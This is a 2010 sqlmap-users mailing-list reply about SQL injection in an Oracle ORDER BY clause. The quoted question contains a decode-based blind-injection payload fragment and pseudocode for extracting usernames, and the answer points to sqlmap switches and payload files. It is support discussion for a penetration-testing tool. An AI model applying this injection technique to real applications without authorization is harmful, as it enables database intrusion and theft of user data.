Re: [sqlmap-users] injecting in the order by clause
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] injecting in the order by clause
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-22 10:08:42
|
Hi Karl, On 19 December 2010 08:39, Buggy <bug...@gm...> wrote: > ... > I (and sqlmap) have found my new nemesis concerning SQL injection: injecting > in the ORDER BY clause: Good for you. > I am currently doing work on a webapp based on an ORACLE database and can > inject here: > > > > …SELECT foo, bar FROM the_table ORDER BY [INJECTION] sqlmap from Subversion repository has full support to detect and exploit injection points in ORDER BY and GROUP BY clause, regardless of the back-end DBMS. > 1) The mean thing is you cannot use UNION because of the ORDER BY clause True. > => Any hints on how to get a working injection going here? Has anyone ever > encountered this rare case? Yes, several times. svn update and enjoy. Test for ORDER BY clause injection against Oracle --level to be set to 3. We are going to update the user's manual just before the official release of 0.9 stable in a month or two, for the time being sqlmap.py -h will highlight you on the meaning of the new switches (--level, --risk, etc.). > 2) the furthest I have gotten in a try to get into a blind sql injection > situation is the following: > > [INJECTION] = decode ((select 'a' from dual),'a',foo,bar) > > > > …depending on whether ‘a’ or something else is selected, the ouput is sorted > by column ‘foo’ or column ‘bar’ > > > > …the idea is to “ask the question” here (pseudocode): > > decode ((select first letter of first username < chr(128)),TRUE,foo,bar) > > > > …but it doesn’t work as I do not know how to write the question query or how > to decide if the answer is TRUE or FALSE > > > > > > > > => is there some hint how to continue from here and maybe even get the thing > working with sqlmap? Again, svn update. If you want to understand how it works, check yourself xml/payloads.xml file, lines 617-634 in your case. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
